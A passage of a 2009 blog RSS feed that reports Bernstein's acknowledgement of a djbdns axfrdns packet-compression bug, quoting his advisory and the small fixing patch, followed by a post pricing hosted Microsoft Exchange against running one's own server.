href="http://en.wikipedia.org/wiki/Daniel_J._Bernstein" rel="nofollow" title="Dr. Daniel J. Bernstein"  target="_blank">Dr. Bernstein</a> acknowledges a security flaw in one of his software packages, <a target="_blank" href="http://cr.yp.to/djbdns.html" rel="nofollow" title="djbdns"  target="_blank">djbdns</a>.   He has always offered to pay $1000 to anyone that found a security flaw in something he has offered from Qmail, ucspi-tcp, daemontools, and djbdns.  It took a decade for someone to find it, and unlike most software providers he also has provided a patch.</p><p><span id="more-854"></span>So while we are still waiting on Microsoft to release a patch to fix the<a href="http://www.zerosource.org/2009/02/zero-day-exploit-in-microsoft-excel.html" target="_blank"> Zero Day exploit in Excel</a>, there is already a patch for djbdns.  Take note software vendors, this is how you do it.</p><p>From: D. J. Bernstein &lt;djb &lt;at&gt; cr.yp.to&gt;<br /> Subject: <a target="_blank" href="http://news.gmane.org/find-root.php?message_id=%3c20090304013421.60368.qmail%40cr.yp.to%3e"rel="nofollow"  target="_top">djbdns&lt;=1.05 lets AXFRed subdomains overwrite domains</a><br /> Newsgroups: <a target="_blank" href="http://news.gmane.org/gmane.network.djbdns" rel="nofollow"  target="_top">gmane.network.djbdns</a><br /> Date: 2009-03-04 01:34:21 GMT  (3 days, 2 hours and 8 minutes ago)</p><pre>If the administrator of example.com publishes the example.com DNS data
through tinydns and axfrdns, and includes data for sub.example.com
transferred from an untrusted third party, then that third party can
control cache entries for example.com, not just sub.example.com. This is
the result of a bug in djbdns pointed out by Matthew Dempsky. (In short,
axfrdns compresses some outgoing DNS packets incorrectly.)

Even though this bug affects very few users, it is a violation of the
expected security policy in a reasonable situation, so it is a security
hole in djbdns. Third-party DNS service is discouraged in the djbdns
documentation but is nevertheless supported. Dempsky is hereby awarded
$1000.

The next release of djbdns will be backed by a new security guarantee.
In the meantime, if any users are in the situation described above,
those users are advised to apply Dempsky's patch and requested to accept
my apologies. The patch is also recommended for other users; it corrects
the bug without any side effects. A copy of the patch appears below.

---D. J. Bernstein
   Research Professor, Computer Science, University of Illinois at Chicago

--- response.c.orig     2009-02-24 21:04:06.000000000 -0800
+++ response.c  2009-02-24 21:04:25.000000000 -0800
@@ -34,7 +34,7 @@
         uint16_pack_big(buf,49152 + name_ptr[i]);
         return response_addbytes(buf,2);
       }
-    if (dlen &lt;= 128)
+    if ((dlen &lt;= 128) &amp;&amp; (response_len &lt; 16384))
       if (name_num &lt; NAMES) {
        byte_copy(name[name_num],dlen,d);
        name_ptr[name_num] = response_len;</pre><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/03/flaw-in-djbdns-105-hell-has-frozen-over.html">Flaw in djbdns 1.05 &#8211; Hell Has Frozen Over!</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/03/flaw-in-djbdns-105-hell-has-frozen-over.html/feed</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Why Microsoft Hosted Exchange?</title><link>http://www.zerosource.org/2009/03/why-microsoft-hosted-exchange.html</link> <comments>http://www.zerosource.org/2009/03/why-microsoft-hosted-exchange.html#comments</comments> <pubDate>Wed, 04 Mar 2009 03:12:57 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Commentary]]></category> <category><![CDATA[Nerdology]]></category> <category><![CDATA[Hosted Exchange]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[Work]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=831</guid> <description><![CDATA[Lets start out with, I am NOT an Exchange Administrator.  We brand others for that.  I am an *nix Administrator, but I know more then most on Exchange.  We tried to provide hosted services using different platforms on Linux only to be left hanging from either lack of support and or stuff that just didn&#8217;t [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/03/why-microsoft-hosted-exchange.html">Why Microsoft Hosted Exchange?</a></p> ]]></description> <content:encoded><![CDATA[<p>Lets start out with, I am <span style="text-decoration: underline;">NOT</span> an Exchange Administrator.  We brand others for that.  I am an *nix Administrator, but I know more then most on Exchange.  We tried to provide hosted services using different platforms on Linux only to be left hanging from either lack of support and or stuff that just didn&#8217;t work right.  If you want Exchange, the best thing is well Exchange period.<br /> <span id="more-831"></span><br /> I get asked on a daily basis from one person or another, why would I want to pay for hosted Exchange vs having my own Exchange Server.  I currently only offer Exchange 2007, so we are going to base everything from this point on Exchange 2007.  We are going to account for 15 users, of course I can provide Exchange for 1 or 1000+ its up to you.</p><p>So what do you get with Zero&#8217;s hosted Exchange Solution.  Well you get 1 Gb per user in storage, so a total of 15 Gb, with my control panel you can allocate who gets this space.  You get multiple backups, including offsite.  You get Spam and Virus protection for each mailbox with user and domain level interfaces to manage your own spam and virus settings.   We maintain our spam rules a continuing 24/7 basis, we don&#8217;t wait for someone else to figure it out.  You get 24 hour 7 day a week 365 day a year Support for the server.  The server is maintained in a fully redundant, secured, data center.  Redundant in Power, Cooling, and Internet Connections.</p><p>Most important, in my opinion, you are not going to call and speak to someone who has a manual, someone who hasn&#8217;t a clue how email works.  You are going to speak to an engineer, and you are going to speak to someone that can help you now!  Personally I have over 15 years of Corporate/Enterprise messaging, and currently maintain several <a target="_blank" href="http://www.qmail.org/" rel="nofollow" title="Qmail"  target="_blank">Qmail</a> Clusters and Exchange Gateways based on either Qmail and or <a target="_blank" href="http://www.postfix.org/" rel="nofollow" title="Postfix"  target="_blank">Postfix</a>.</p><p>So lets compare some numbers, we are going to assume that you have a Windows Network environment with cal&#8217;s (Client Access License) for all of your users and an Active Directory already setup. We are only going to worry about the Exchange server in pricing.</p><p>If you have a full IT staff you will probably not need to hire any additional IT person to maintain your Exchange server. Remember when hiring them, they need MORE then just Exchange experience.  This is a problem alot of companies run into.  Their IT staff can handle Exchange until they hook it up to the internet.  If you are not able to delegate Exchange administration to someone else, just a good guess but add around $40,000 per year to this cost.  This is the low end cost, not including benefits.</p><p>We need a few things for our 15 users (went cheapest where possible):</p><blockquote><p>Exchange Server 2007 Standard Edition &#8211; $699<br /> Exchange Cal (Client Access License, required for each user $67)x15 = $1005<br /> Server Dell PowerEdge T105 $5,544 &#8211; includes 64 bit Processor(required for Exchange 2007), 4 Gb memory max for standard edition, windows server 2008 standard edition with 5 Cal, Raid 1 160 Gb drives, DAT72 backup drive with Symantec Backup Exec 12.5 for Email<br /> Postini Google &#8211; $12.00 year = $180 (i looked for cheapest, or something I would use)</p></blockquote><p>So you are looking at $7,428 just to start.</p><p>Add the additional staff and your at $47,428</p><p>So what does my hosted cost?  Well its $12.95 per user per month.  So it will take 3 years to pay off this if you do not need additional staff.  If you need additional staff, you are looking at 20 years, just to pay for the first YEAR!  We are also not accounting for maintenance, hardware replacements, software upgrades, etc&#8230; oh yea all that is included with mine.  If you need addition license for your own, another $67 and I believe you can only buy them in 5 packs.  Lets say you lay off 5 people&#8230; with your own Exchange server.  You already bought it.   With mine, the next month you only pay for 10 users.</p><p>And this is why I provide Microsoft Hosted Exchange.  If you have questions you can use the &#8220;<a href="http://www.zerosource.org/contact-zero"title="Contact Zero"  target="_self">Contact</a>&#8220;  above or call me 205-978-9230 ext 234,  and I will point you in the right direction.</p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/03/why-microsoft-hosted-exchange.html">Why Microsoft Hosted Exchange?</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2010/02/operation-aurora-continues.html" title="Operation Aurora &#8211; Continues">Operation Aurora &#8211; Continues</a> (0)</li><li><a href="http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html" title="Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer">Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer</a> (0)</li><li><a href="http://www.zerosource.org/2009/04/is-it-so-bad-to-be-e-mail-nazi.html" title="Is it so bad to be E-mail Nazi!">Is it so bad to be E-mail Nazi!</a> (0)</li><li><a href="http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html" title="April Fools, You&#8217;re Infected.. No Really.. Seriousl">April Fools, You&#8217;re Infected.. No Really.. Seriousl</a> (3)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2009/03/why-microsoft-hosted-exchange.html/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> </channel> </rss>
<!-- Served from: www.zerosource.org @ 2010-09-09 10:06:15 by W3 Total Cache -->